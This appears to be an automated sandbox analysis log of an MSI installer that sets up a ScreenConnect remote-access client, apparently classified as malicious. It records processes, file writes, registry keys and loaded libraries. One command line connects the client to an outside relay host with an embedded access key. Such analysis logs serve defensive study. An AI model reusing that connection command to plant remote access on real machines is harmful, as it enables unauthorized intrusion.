Source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1669176626.0000000004B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr; String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1669176626.0000000004B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr; String found in binary or memory: http://wixtoolset.org/releases/
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2909894070.00000000125EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr; String found in binary or memory: http://www.digicert.com/CPS0
Source: ScreenConnect.WindowsCredentialProvider.dll.1.dr; String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ScreenConnect.Core.dll.3.dr; String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                        Spam, unwanted Advertisements and Ransom Demands

Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_056B25C0 CreateProcessAsUserW
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\5c1175.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{64D6109D-BB46-4239-08D9-EC110E53E92E}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI15E9.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI160A.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI17FF.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\5c1177.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\5c1177.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{64D6109D-BB46-4239-08D9-EC110E53E92E}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{64D6109D-BB46-4239-08D9-EC110E53E92E}\DefaultIcon
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Windows\Installer\wix{64D6109D-BB46-4239-08D9-EC110E53E92E}.SchedServiceConfig.rmi
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\nfeecrl4.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\nfeecrl4.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSI160A.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_056B0040
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_056B0040
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 7_2_00007FFD9B406FE8
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 7_2_00007FFD9B4010D7
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 7_2_00007FFD9B4010CF
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 7_2_00007FFD9B715BC1
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 7_2_00007FFD9B716283
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 7_2_00007FFD9B7100F2
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 7_2_00007FFD9B716C80
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B4170BA
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B4110CF
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B4110D7
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B722B65
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B720790
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B725F16
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B72E6C6
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B727185
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B72F472
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B723051
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B721330
Source: setup.msi | Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs setup.msi
Source: setup.msi | Binary or memory string: OriginalFilenameSfxCA.dllL vs setup.msi
Source: setup.msi | Binary or memory string: OriginalFilenamewixca.dll\ vs setup.msi
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs | Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs | Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs | Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: classification engine | Classification label: mal80.evad.winMSI@15/54@1/1
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6032843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: setup.msi | Static file information: TRID: Microsoft Windows Installer (60509/1) 57.88%
Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\setup.msi"
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F119A6F073F792F7D0ECEED6C10FA13E C
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6032843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5DD10B1CF791748F5CDE2E7F0943941D
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B2E11333BB1052CECFB49C593AC661A5 E Global\MSI0000
Source: unknown | Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=DXBLeave&c=&c=&c=&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "c21e480d-13f5-4799-892b-1b4075726758" "User"
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "8bc7d613-b74f-4d66-a18a-de9574d5dc1b" "System"
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F119A6F073F792F7D0ECEED6C10FA13E C
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5DD10B1CF791748F5CDE2E7F0943941D
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B2E11333BB1052CECFB49C593AC661A5 E Global\MSI0000
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6032843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "c21e480d-13f5-4799-892b-1b4075726758" "User"
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "8bc7d613-b74f-4d66-a18a-de9574d5dc1b" "System"
                        Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: gpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: wtsapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: winsta.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: netapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: samcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: samlib.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: dhcpcsvc6.dll
